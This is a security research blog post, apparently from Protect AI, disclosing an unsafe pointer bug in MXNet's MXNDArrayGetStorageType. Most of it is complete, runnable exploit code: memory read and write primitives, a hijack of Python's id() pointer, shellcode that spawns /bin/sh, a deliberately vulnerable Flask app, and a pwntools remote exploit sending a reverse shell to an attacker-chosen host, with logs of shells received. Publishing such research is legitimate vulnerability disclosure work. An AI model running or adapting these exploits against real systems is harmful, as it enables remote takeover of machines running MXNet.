MXNet Unsafe Pointer Usage

Hacking AI/ML: MXNet Unsafe Pointer Usage

Note from Protect AI

Security researcher Bryce Bearchell, in collaboration with Protect AI and huntr.mlsecops.com, discovered an interesting bug in MXnet, a popular library for creating machine learning models. Mishandling of memory in a core, commonly used, function in MXnet leads to arbitrary code execution. In this guest blog post by Bryce, he explains how this issue can lead to remote code execution if MXnet remotely ingests user input such as through a web application.

What is MXNet?

Apache MXNet was designed as a flexible and efficient library for deep learning, with features like distributed training, 8 language bindings, a thriving ecosystem, as well as a hybrid front end. The current version of this project is 1.9.1, and is available via public repositories / PyPi ecosystem. The source code of the project can be obtained via GitHub:

git clone --recursive https://github.com/apache/mxnet

And the release version of the library for Python3 can be obtained via Pip:

pip3 install mxnet

Vulnerability

MXNet contains a vulnerability in a common function that takes user input which allows attackers to perform code execution. This is particularly dangerous when MXNet is used in an API or web application as remote user input leads directly to remote code execution and system takeover.

Discovering the Vulnerability

MXNet has a number of API functions exposed to python via `src/c_api/c_api.cc`, and then wrapped in user-friendly functions in `python/mxnet/ndarray/ndarray.py`. A large number of these functions give and receive pointers from the application, rather than properly abstracting that and tracking them in the C++ code. This enables an attacker with access to the API to merely modify an object pointer (such as NDArray.handle) or simply call the library functions with malicious pointers to cause memory corruption.

After some manual source code review, the function `MXNDArrayGetStorageType` in the C code was discovered to be vulnerable. The Python bindings can be found in `python/mxnet/ndarray/ndarray.py`:

def _storage_type(handle):

storage_type = ctypes.c_int(0)

check_call(_LIB.MXNDArrayGetStorageType(handle,

ctypes.byref(storage_type)))

return storage_type.value

The Bug

The Python bindings map directly to the MXNet Library API in `src/c_api/c_api.cc`. The `MXNDArrayGetStorageType` function contains the following code:

int MXNDArrayGetStorageType(NDArrayHandle handle, int

*out_storage_type) { // [0]

API_BEGIN();

NDArray *arr = static_cast<NDArray*>(handle);

if (!arr->is_none()) { // [1]

*out_storage_type = arr->storage_type(); // [2]

} else {

*out_storage_type = kUndefinedStorage;

}

API_END();

}

There are three things to note in this function:

There is no validation of the handle, it is immediately cast to a pointer (`arr`) and used. Same with the `int *out_storage_type` pointer.
The `is_none()` function is defined previously in `ndarray.h` as an inline function, which just checks the value at `[*arr + 0]` and compares it to zero. We can easily bypass this check by setting the handle pointer inside of a byte array buffer we control and setting that value to non-zero.
`storage_type()` is also function is defined previously in `ndarray.h` as an inline function, its assembly is just two instructions:

mov eax, DWORD PTR [rbx+0x50] ; rbx is handle

mov DWORD PTR [rbp+0x0], eax ; rbp is the address of out_storage_type

Number 2 is extremely powerful, it not only gives an attacker the ability to write anywhere in memory, but also read any memory!

Reading All Memory

By supplying a handle that points into a bytes buffer, we can bypass the check at 1 and control what memory address gets read back out in 2. One thing to note is that we have almost full memory read access--in order to read memory address `XYZ` , we have to set `handle` to `XYZ - 0x50`, and that value must be non-zero or the function will return `0xffffffff`. Another constraint due to the data type of `out_storage_type` is that reads will only result in 4 bytes. That's OK, as we can just read twice to get a full 8 byte QWORD:

def r64(addr):

# this will fail if addr - 0x50 is null, but we can detect that and return False

storage_type1 = ctypes.c_uint64(0)

storage_type2 = ctypes.c_uint64(0)

mx.base._LIB.MXNDArrayGetStorageType(ctypes.c_void_p(addr-0x50), ctypes.byref(storage_type1))

mx.base._LIB.MXNDArrayGetStorageType(ctypes.c_void_p(addr-0x50+4), ctypes.byref(storage_type2))

if storage_type1.value == 0xffffffff or storage_type2.value == 0xffffffff:

return False

ret = (storage_type2.value << 32) | storage_type1.value

return ret

Writing All Memory

Because in number 2 we control the address of `out_storage_type` so we have the ability to write anywhere in memory – without the reading memory constraint! However, due to the data of `out_storage_type`, we can only write 4 bytes at a time, but that's OK! We just write twice, offset by 4 bytes to write a QWORD into memory:

def w64(addr, val):

# because we have a 4 byte write, we have to write twice to put a QWORD into memory

fake_object1 = b"A" * 0x10 + b"\0" * 0x40 + pack('<Q', val) + pack('<Q', val)

fake_object_addr1 = id(fake_object1) + sizeof(b"")-1

mx.base._LIB.MXNDArrayGetStorageType(ctypes.c_void_p(fake_object_addr1), ctypes.c_void_p(addr))

mx.base._LIB.MXNDArrayGetStorageType(ctypes.c_void_p(fake_object_addr1+4), ctypes.c_void_p(addr+4))

RIP Control

Now that we have read and write primitives, we can easily get code execution by overwriting a built-in function in Python, and `id()` (address of object) is a great target for this:

# Get the address of id, and then using some reverse engineering of Python object

# formats in memory, we know that the actual function pointer is at offset 0x30

id_addr = id(id)+0x30

# overwrite the id() function pointer!

w64(id_addr, 0x4142434445464748)

And once that has been overwritten, we can cause `RIP` to jump to that address by calling `id()` on an object:

id(1) # this will cause a crash with RIP=0x4142434445464748

Local Exploit Development

Because we can read and write in memory, ASLR (Address Space Randomization) is trivially defeated by calling Python builtin functions like `id()`. That will enable us to know where all the executables and libraries are in memory, although we only have control over the following with our code execution primitive:

- `RIP`

- `[RSI]+0x18` (object parameter passed as argument to `id()`)

- `[RSP-0x48]+0x20` (object parameter passed as argument to `id()`)

At this point, we can either construct a ROP (Return Oriented Programming) chain, but that will require version specific gadgets for every version of Python, LibC, and LibFFI. Great for a single target, but we can do better!

Upon inspection of the memory mapped regions, there is a very interesting memory region referenced by `/usr/lib/x86_64-linux-gnu/libffi.so.8.1.0`:

vmmap

...

0x00007ffff7ffa000 0x00007ffff7ffb000 0x0000000000000000 rwx

This page will allow us to write shellcode into it (the `w` permission), as well as run code within it (the `x` permission)! For ease & portability, we will read the map from `/proc/self/maps`, however, it is completely possible to obtain a reference to this memory space in a non-portable way (offsets from each library would need to be computed per Python, FFI, and LibC version):

addr = 0

for line in open('/proc/self/maps','r').read().split('\n'):

if 'rwx' in line:

addr = int('0x' + line.split('-')[0], 0x10

We can write our shellcode into that address, and use our RIP control primitive to jump to our shellcode:

user@mxnetdev:~/exploit$ python3 MXNetUnsafePointerExploit.py

******** MXNet Unsafe Pointer Usage Exploit ********

[+] derived RWX_ADDR: 0x7f9ebf94e000

[+] set RWX_ADDR += 0x800 (halfway through page): 0x7f9ebf94e800

[+] Writing shellcode to 0x7f9ebf94e800

[w] w64(0x7f9ebf94e800, 0x120d8d4cec8b48)

[w] w64(0x7f9ebf94e808, 0x58016a318d490000)

[w] w64(0x7f9ebf94e810, 0xe9050f5a146aff33)

[w] w64(0x7f9ebf94e818, 0x6c70784500000015)

[w] w64(0x7f9ebf94e820, 0x636375532074696f)

[w] w64(0x7f9ebf94e828, 0xa216c7566737365)

[w] w64(0x7f9ebf94e830, 0xc031489090909000)

[w] w64(0x7f9ebf94e838, 0x622f2fbb48d23148)

[w] w64(0x7f9ebf94e840, 0xebc14868732f6e69)

[w] w64(0x7f9ebf94e848, 0x485750e789485308)

[w] w64(0x7f9ebf94e850, 0x50f3bb0e689)

[+] Shellcode written!

[+] Deriving address of Python3 builting function id...

[+] Overwriting id() function pointer with address to shellcode...

[w] w64(0x7f9ebf250d40, 0x7f9ebf94e800)

[+] Triggering the exploit!

Exploit Successful!

$ id

uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd)

$ whoami

user

$ exit

user@mxnetdev:~/exploit$

The source code for this exploit is included in Appendix A.

Remote Exploitation Against a Vulnerable Application

To demonstrate the impact of the vulnerability, we will exploit a custom vulnerable application, cause it to run our shellcode, and get access to a remote system with a shellcode reverse interactive command shell.

A simple vulnerable Python Flask application was made:

The source code for this application is included in Appendix B

The conversion process of the local exploit to a remote one is just ensuring that the following are executed server-side:

- `MXNDArrayGetStorageType`

- `id`

Because the vulnerable application interacts over HTTP and responds in JSON, we can convert those local calls to remote ones by using Python `requests`:

Local (old)

mx.base._LIB.MXNDArrayGetStorageType(

ctypes.c_void_p(fake_object_addr1),

ctypes.c_void_p(addr))

Remote (new)

def MXNDArrayGetStorageType(handle, storage_type=-1):

'''

Exercise the vulnerable code path in src/c_api/c_api.cc

int MXNDArrayGetStorageType(NDArrayHandle handle,

int *out_storage_type) {

API_BEGIN();

NDArray *arr = static_cast<NDArray*>(handle);

if (!arr->is_none()) {

*out_storage_type = arr->storage_type();

} else {

*out_storage_type = kUndefinedStorage;

}

API_END();

}

'''

global URL

path = '/get_storage_type'

params = {}

params['handle'] = handle

if storage_type != -1:

params['storage_type'] = storage_type

response = requests.get(URL+path, params=params)

ret = int(json.loads(response.text)['result'])

return ret

Local (old)

id(1)

Remote (new)

def _id(id=0, objtype='int'):

'''

Plant a bytestring into memory and obtain it's address. Not strictly

required (r64 & w64 are the only required functions), however it

greatly simplifies exploitation for demonstration.

'''

global URL

path = '/id'

params = {}

if objtype != 'int':

id = base64.b64encode(id)

params['id'] = id

params['objtype'] = objtype

response = requests.get(URL+path, params=params)

ret = int(json.loads(response.text)['result'])

return ret

And with some modification of the shellcode, we can simply re-run the exploit and it now works remotely:

$ python3 x.py http://192.168.200.185:5000 192.168.200.186 1337

******** MXNet Unsafe Pointer Usage Exploit ********

[i] got id 0x7fde61190d10

[+] derived RWX_ADDR: 0x7ffe3d3ae000

[+] set RWX_ADDR += 0x800 (halfway through page): 0x7ffe3d3ae800

[+] Writing shellcode to 0x7ffe3d3ae800

[w] w64(0x7ffe3d3ae800, 0x3148ff3148c03148)

[w] w64(0x7ffe3d3ae808, 0x6ac0314dd23148f6)

[w] w64(0x7ffe3d3ae810, 0x5a066a5e016a5f02)

[w] w64(0x7ffe3d3ae818, 0xc08949050f58296a)

[w] w64(0x7ffe3d3ae820, 0x5241d2314df63148)

[w] w64(0x7ffe3d3ae828, 0x2444c766022404c6)

[w] w64(0x7ffe3d3ae830, 0xc0042444c7390502)

[w] w64(0x7ffe3d3ae838, 0x106ae68948bac8a8)

[w] w64(0x7ffe3d3ae840, 0xf582a6a5f50415a)

[w] w64(0x7ffe3d3ae848, 0x485e036af6314805)

[w] w64(0x7ffe3d3ae850, 0x75050f58216aceff)

[w] w64(0x7ffe3d3ae858, 0x5a5e5757ff3148f6)

[w] w64(0x7ffe3d3ae860, 0x2f6e69622f2fbf48)

[w] w64(0x7ffe3d3ae868, 0x545708efc1486873)

[w] w64(0x7ffe3d3ae870, 0x50f583b6a5f)

[+] Shellcode written!

[+] Deriving address of Python3 builting function id...

[+] Overwriting id() function pointer with address to shellcode...

[w] w64(0x7fde61190d40, 0x7ffe3d3ae800)

[^] Setting up listening shell...

[+] Trying to bind to 192.168.200.186 on port 1337: Done

[+] Waiting for connections on 192.168.200.186:1337: Got connection from 192.168.200.185 on port 57048

[+] Triggering the exploit!

[------------------------------------------------------------]

[+] Received a shell!!!

[------------------------------------------------------------]

[*] Switching to interactive mode

uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),134(lxd),135(sambashare),999(docker)

user

/home/user

$ id

uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),134(lxd),135(sambashare),999(docker)

The source code for this exploit is included in Appendix C.

Recommendations

The fundamental cause of this vulnerability is that MXNet requires its API consumers to manage MXNet's internal state (the `handle` property on many objects). To avoid this, MXNet should manage its own state. This can be done by introducing an internal table within MXNet that contains references to objects mapped to a token, and users of the API can then just refer the token when requesting library functions – allowing MXNet to properly handle and retain control over its memory critical operations.

Appendix A - Local Exploit (Tested on Python 3.10.6 & MXNet 1.9.1)

python

#!/usr/bin/env python3

'''

MXNet Unsafe Pointer Usage Exploit

Payload:

write(1, "Exploit Successful!\n", 0x14);

execve("/bin/sh", ["/bin/sh"], NULL)

'''

import ctypes

from struct import pack, unpack

import mxnet as mx

def sizeof(obj):

'''

Determine the size of a Python object in memory

Source: https://github.com/DavidBuchanan314/unsafe-python

'''

return type(obj).__sizeof__(obj)

def w64(addr, val):

'''

Write 64 bytes to an address in memory. Note that because we have a

4 byte write, we have to write twice to put a QWORD into memory.

'''

print(f'[w]\t\tw64({hex(addr)}, {hex(val)})')

fake_object1 = b'A' * 0x10 + b'\0' * 0x40 + pack('<Q', val) + pack('<Q', val)

fake_object_addr1 = id(fake_object1) + sizeof(b'')-1

mx.base._LIB.MXNDArrayGetStorageType(

ctypes.c_void_p(fake_object_addr1),

ctypes.c_void_p(addr))

mx.base._LIB.MXNDArrayGetStorageType(

ctypes.c_void_p(fake_object_addr1+4),

ctypes.c_void_p(addr+4))

if __name__ == '__main__':

print(f'{"*"*8} MXNet Unsafe Pointer Usage Exploit {"*"*8}')

RWX_ADDR = 0

with open('/proc/self/maps','r', encoding="utf-8") as fd:

for line in fd.read().split('\n'):

if 'rwx' in line:

RWX_ADDR = int('0x' + line.split('-')[0], 0x10)

print(f'[+]\tderived RWX_ADDR: {hex(RWX_ADDR)}')

RWX_ADDR += 0x800

print(f'[+]\tset RWX_ADDR += 0x800 (halfway through page): {hex(RWX_ADDR)}')

# shellcode obtained from Binary Ninja's Shellcode Compiler

# scc x86_64 / linux

# void main() {

# write(1, "Exploit Successful!\n", 0x14);

# interactive_sh();

# }

SHELLCODE = b'\x48\x8b\xec\x4c\x8d\x0d\x12\x00\x00\x00\x49\x8d\x31\x6a\x01\x58' +\

b'\x33\xff\x6a\x14\x5a\x0f\x05\xe9\x15\x00\x00\x00\x45\x78\x70\x6c' +\

b'\x6f\x69\x74\x20\x53\x75\x63\x63\x65\x73\x73\x66\x75\x6c\x21\x0a' +\

b'\x00\x90\x90\x90\x90\x48\x31\xc0\x48\x31\xd2\x48\xbb\x2f\x2f\x62' +\

b'\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x50\x57\x48' +\

b'\x89\xe6\xb0\x3b\x0f\x05'

SHELLCODE += b'\x00' * ((8-len(SHELLCODE) % 8)) # pad to 8 bytes

print(f'[+]\tWriting shellcode to {hex(RWX_ADDR)}')

for i in range(0, len(SHELLCODE), 8):

v = unpack('<Q', SHELLCODE[i:i+8])[0]

sc_addr = RWX_ADDR+i

w64(sc_addr, v)

print('[+]\tShellcode written!')

print('[+]\tDeriving address of Python3 builting function id...')

id_addr = id(id)+0x30

print('[+]\tOverwriting id() function pointer with address to shellcode...')

w64(id_addr, RWX_ADDR)

print('[+]\tTriggering the exploit!')

id(1)

Shellcode Payload

00000000 488bec mov rbp, rsp {__return_addr}

00000003 4c8d0d12000000 lea r9, [rel data_1c] {"Exploit Successful!\n"}

0000000a 498d31 lea rsi, [r9] {data_1c, "Exploit Successful!\n"}

0000000d 6a01 push data_0+1 {var_8}

0000000f 58 pop rax {var_8} {data_0+1}

00000010 33ff xor edi, edi {sub_0}

00000012 6a14 push data_14 {var_8}

00000014 5a pop rdx {var_8} {data_14}

00000015 0f05 syscall ; write(1, "Exploit Successful!\n", 0x14)

00000017 e915000000 jmp sub_31

0000001c char data_1c[0x15] = "Exploit Successful!\n", 0

00000031 90 nop

00000032 90 nop

00000033 90 nop

00000034 90 nop

00000035 4831c0 xor rax, rax {sub_0}

00000038 4831d2 xor rdx, rdx {sub_0}

0000003b 48bb2f2f62696e2f…mov rbx, 0x68732f6e69622f2f

00000045 48c1eb08 shr rbx, 0x8 {0x68732f6e69622f}

00000049 53 push rbx {var_8} {0x68732f6e69622f}

0000004a 4889e7 mov rdi, rsp {var_8}

0000004d 50 push rax {var_10} {sub_0}

0000004e 57 push rdi {var_8} {var_18}

0000004f 4889e6 mov rsi, rsp {var_18}

00000052 b03b mov al, 0x3b

00000054 0f05 syscall ; execve("/bin/sh", ["/bin/sh"], NULL)

Appendix B - Vulnerable Application (Tested on Python 3.10.6 & MXNet 1.9.1)

This app requires `Flask` and was tested against version `2.3.2`. See Appendix D for a full `requirements.txt`. After saving the python code as `app.py`, it can be run like so:

$ flask run --host=0.0.0.0

App.py

import os, ctypes

from flask import Flask, request, jsonify

from urllib.parse import urlparse

import base64

app = Flask(__name__)

BASE = os.path.expanduser('~') + '/.local/lib/python3.10/site-packages/mxnet/'

mxnet = ctypes.CDLL(BASE + 'libmxnet.so')

PID = os.getpid()

fd = open('/proc/self/maps','r', encoding="utf-8")

MAPS = fd.read()

fd.close()

traffic = []

@app.route('/get_storage_type', methods=['GET'])

def get_storage_type():

handle = int(request.args.get('handle'))

out_storage_type = 0

out = None

if request.args.get('storage_type'):

out_storage_type = int(request.args.get('storage_type'))

out = out_storage_type

mxnet.MXNDArrayGetStorageType(ctypes.c_void_p(handle), ctypes.c_void_p(out))

else:

out = ctypes.byref(out_storage_type)

mxnet.MXNDArrayGetStorageType(ctypes.c_void_p(handle), out)

response = {'result': out_storage_type}

return jsonify(response)

@app.route('/id', methods=['GET'])

def client_id():

global traffic

objtype = request.args.get('objtype')

client_id = None

if objtype == 'int':

client_id = int(request.args.get('id'))

else:

data = request.args.get('id')

client_id = base64.b64decode(data)

traffic.append(client_id)

response = {'result': str(id(traffic[len(traffic)-1]))}

return jsonify(response)

@app.route('/rwx', methods=['GET'])

def rwx():

rwx_addr = 0

with open('/proc/self/maps','r', encoding="utf-8") as fd:

for line in fd.read().split('\n'):

if 'rwx' in line:

rwx_addr = int('0x' + line.split('-')[0], 0x10)

response = {'result': str(rwx_addr)}

return jsonify(response)

@app.route('/', methods=['GET'])

def index():

global PID, MAPS

return f'''

<html>

<head><title>Example Vulnerable Application</title></head>

<body>

<h1>Example Vulnerable Application</h1>

<pre>

id: {id(id)}

pid: {PID}

Minimum functionality required to demonstrate exploit:

/get_storage_type

&lthandle: int&gt

[storage_type: int]

returns result (int)

E.G: /get_storage_type?handle=0&storage_type=0

/id

&ltid: str&gt

&ltobjtype: str&lt'int', 'base64'&gt&gt

returns result (int)

E.G: <a href='/id?id=0&objtype=int'>/id?id=0&objtype=int</a>

Optional:

/rwx

returns result (int)

E.G: <a href='/rwx'>/rwx</a>

</pre>

</body>

</html>

if __name__ == '__main__':

app.run(debug=False)

Appendix C - Remote Exploit (Tested on Python 3.10.6 & MXNet 1.9.1)

This exploit uses pwntools, and it can be obtained here: https://github.com/Gallopsled/pwntools. See Appendix D for a full `requirements.txt`.

#!/usr/bin/env python3

'''

MXNet Unsafe Pointer Usage Exploit

Payload:

Reverse TCP shell

'''

import ctypes

import mxnet as mx

import requests, json, base64

from pwn import *

from struct import pack, unpack

from time import sleep

from threading import Thread

from sys import argv

URL = 'http://127.0.0.1:5000'

PORT = 1337

BIND_ADDRESS = '127.0.0.1'

REVERSE_SHELL_IP = 0

def MXNDArrayGetStorageType(handle, storage_type=-1):

'''

Exercise the vulnerable code path in src/c_api/c_api.cc

int MXNDArrayGetStorageType(NDArrayHandle handle,

int *out_storage_type) {

API_BEGIN();

NDArray *arr = static_cast<NDArray*>(handle);

if (!arr->is_none()) {

*out_storage_type = arr->storage_type();

} else {

*out_storage_type = kUndefinedStorage;

}

API_END();

}

'''

global URL

path = '/get_storage_type'

params = {}

params['handle'] = handle

if storage_type != -1:

params['storage_type'] = storage_type

response = requests.get(URL+path, params=params)

ret = int(json.loads(response.text)['result'])

return ret

def _id(id=0, objtype='int'):

'''

Plant a bytestring into memory and obtain it's address. Not strictly

required (r64 & w64 are the only required functions), however it

greatly simplifies exploitation for demonstration.

'''

global URL

path = '/id'

params = {}

if objtype != 'int':

id = base64.b64encode(id)

params['id'] = id

params['objtype'] = objtype

response = requests.get(URL+path, params=params)

ret = int(json.loads(response.text)['result'])

return ret

def rwx():

'''

Obtain the location of the RWX page. This is optional, however

introspection using reads will require per-version of python &

ctypes, making this less portable for demonstration.

'''

global URL

path = '/rwx'

response = requests.get(URL+path)

ret = int(json.loads(response.text)['result'])

return ret

def get_id_reference():

'''

To use id as a trigger, we need to know where it lies in memory.

'''

global URL

path = '/'

response = requests.get(URL+path)

ret = 0

for line in response.text.split('\n'):

if 'id' in line:

ret = int(line.split(': ')[1])

break

print('[i]\tgot id', hex(ret))

return ret

def sizeof(obj):

'''

Determine the size of a Python object in memory.

Source: https://github.com/DavidBuchanan314/unsafe-python

'''

return type(obj).__sizeof__(obj)

def r64(addr):

'''

Read arbitrary memory with a constraint that addr - 0x50 must be

non-null. We detect when this condition occurs, and fail properly.

'''

storage_type1 = MXNDArrayGetStorageType(addr-0x50)

storage_type2 = MXNDArrayGetStorageType(addr-0x50+4)

if storage_type1.value == 0xffffffff or storage_type2.value == 0xffffffff:

return False

ret = (storage_type2.value << 32) | storage_type1.value

return ret

def w64(addr, val):

'''

Write 64 bytes to an address in memory. Note that because we have a

4 byte write, we have to write twice to put a QWORD into memory.

'''

print(f'[w]\t\tw64({hex(addr)}, {hex(val)})')

fake_object_addr1 = _id(

b'A' * 0x10 + b'\0' * 0x40 + pack('<Q', val) + pack('<Q', val),

objtype='base64') + sizeof(b'')-1

MXNDArrayGetStorageType(

fake_object_addr1,

addr

)

MXNDArrayGetStorageType(

fake_object_addr1 + 4,

addr + 4

)

def trigger(_):

sleep(1)

print('[+]\tTriggering the exploit!')

try:

_id(1)

except:

pass

if __name__ == '__main__':

if len(argv) != 4:

print('Usage:\n\tunsafe_pointer_exploit.py <target URL> <rev_shell_ip> <port>')

exit(1)

URL = argv[1]

BIND_ADDRESS = argv[2]

PORT = int(argv[3])

REVERSE_SHELL_IP = int(BIND_ADDRESS.split('.')[0]) << 24

REVERSE_SHELL_IP |= int(BIND_ADDRESS.split('.')[1]) << 16

REVERSE_SHELL_IP |= int(BIND_ADDRESS.split('.')[2]) << 8

REVERSE_SHELL_IP |= int(BIND_ADDRESS.split('.')[3])

print(f'{"*"*8} MXNet Unsafe Pointer Usage Exploit {"*"*8}')

id_ref = get_id_reference()

RWX_ADDR = rwx()

print(f'[+]\tderived RWX_ADDR: {hex(RWX_ADDR)}')

RWX_ADDR += 0x800

print(f'[+]\tset RWX_ADDR += 0x800 (halfway through page): {hex(RWX_ADDR)}')

# This shellcode was obtained from

# https://shell-storm.org/shellcode/files/shellcode-857.html

SHELLCODE = b'\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x4d\x31\xc0\x6a' +\

b'\x02\x5f\x6a\x01\x5e\x6a\x06\x5a\x6a\x29\x58\x0f\x05\x49\x89\xc0' +\

b'\x48\x31\xf6\x4d\x31\xd2\x41\x52\xc6\x04\x24\x02\x66\xc7\x44\x24' +\

b'\x02'+ pack('>H', PORT) +b'\xc7\x44\x24\x04' +\

pack('>I', REVERSE_SHELL_IP)+ b'\x48\x89\xe6\x6a\x10' +\

b'\x5a\x41\x50\x5f\x6a\x2a\x58\x0f\x05\x48\x31\xf6\x6a\x03\x5e\x48' +\

b'\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x48\x31\xff\x57\x57\x5e\x5a' +\

b'\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54' +\

b'\x5f\x6a\x3b\x58\x0f\x05'

SHELLCODE += b'\x00' * ((8-len(SHELLCODE) % 8)) # pad to 8 bytes

print(f'[+]\tWriting shellcode to {hex(RWX_ADDR)}')

for i in range(0, len(SHELLCODE), 8):

v = unpack('<Q', SHELLCODE[i:i+8])[0]

sc_addr = RWX_ADDR+i

w64(sc_addr, v)

print('[+]\tShellcode written!')

print('[+]\tDeriving address of Python3 builting function id...')

id_addr = id_ref+0x30

print('[+]\tOverwriting id() function pointer with address to shellcode...')

w64(id_addr, RWX_ADDR)

print('[^]\tSetting up listening shell...')

l = listen(port=PORT, bindaddr=BIND_ADDRESS) # pwntools listen

t = Thread(target=trigger, args=(0,))

t.start()

c = l.wait_for_connection()

print('['+'-'*60+']')

print('[+]\tReceived a shell!!!')

print('['+'-'*60+']')

c.send(b'id;whoami;pwd;\n\n\n\n')

c.interactive()

Shellcode Payload

This shellcode was obtained from https://shell-storm.org/shellcode/files/shellcode-857.html

0000000000400080 <_start>:

400080: 48 31 c0 xor rax,rax

400083: 48 31 ff xor rdi,rdi

400086: 48 31 f6 xor rsi,rsi

400089: 48 31 d2 xor rdx,rdx

40008c: 4d 31 c0 xor r8,r8

40008f: 6a 02 push 0x2

400091: 5f pop rdi

400092: 6a 01 push 0x1

400094: 5e pop rsi

400095: 6a 06 push 0x6

400097: 5a pop rdx

400098: 6a 29 push 0x29

40009a: 58 pop rax

40009b: 0f 05 syscall

40009d: 49 89 c0 mov r8,rax

4000a0: 48 31 f6 xor rsi,rsi

4000a3: 4d 31 d2 xor r10,r10

4000a6: 41 52 push r10

4000a8: c6 04 24 02 mov BYTE PTR [rsp],0x2

4000ac: 66 c7 44 24 02 7a 69 mov WORD PTR [rsp+0x2],0x697a

4000b3: c7 44 24 04 0a 33 35 mov DWORD PTR [rsp+0x4],0x435330a

4000ba: 04

4000bb: 48 89 e6 mov rsi,rsp

4000be: 6a 10 push 0x10

4000c0: 5a pop rdx

4000c1: 41 50 push r8

4000c3: 5f pop rdi

4000c4: 6a 2a push 0x2a

4000c6: 58 pop rax

4000c7: 0f 05 syscall

4000c9: 48 31 f6 xor rsi,rsi

4000cc: 6a 03 push 0x3

4000ce: 5e pop rsi

00000000004000cf <loop>:

4000cf: 48 ff ce dec rsi

4000d2: 6a 21 push 0x21

4000d4: 58 pop rax

4000d5: 0f 05 syscall

4000d7: 75 f6 jne 4000cf <loop>

4000d9: 48 31 ff xor rdi,rdi

4000dc: 57 push rdi

4000dd: 57 push rdi

4000de: 5e pop rsi

4000df: 5a pop rdx

4000e0: 48 bf 2f 2f 62 69 6e movabs rdi,0x68732f6e69622f2f

4000e7: 2f 73 68

4000ea: 48 c1 ef 08 shr rdi,0x8

4000ee: 57 push rdi

4000ef: 54 push rsp

4000f0: 5f pop rdi

4000f1: 6a 3b push 0x3b

4000f3: 58 pop rax

4000f4: 0f 05 syscall

Appendix D - Requirements.txt

Included here is a `requirements.txt`, which contains the relevant versions and packages used:

Flask==2.3.2

mxnet==1.9.1

mxnet_mkl==1.6.0

pwntools==4.9.0

Requests==2.30.0

This can be installed via:

pip3 install -r requirements.txt

AI/ML Hacking Resources

MXNet Unsafe Pointer Usage

Hacking AI/ML: MXNet Unsafe Pointer Usage

Note from Protect AI

What is MXNet?

Vulnerability

Discovering the Vulnerability

The Bug

Reading All Memory

Writing All Memory

RIP Control

Local Exploit Development

Remote Exploitation Against a Vulnerable Application

Recommendations

Appendix A - Local Exploit (Tested on Python 3.10.6 & MXNet 1.9.1)

Shellcode Payload

Appendix B - Vulnerable Application (Tested on Python 3.10.6 & MXNet 1.9.1)

App.py

Appendix C - Remote Exploit (Tested on Python 3.10.6 & MXNet 1.9.1)

Shellcode Payload

Appendix D - Requirements.txt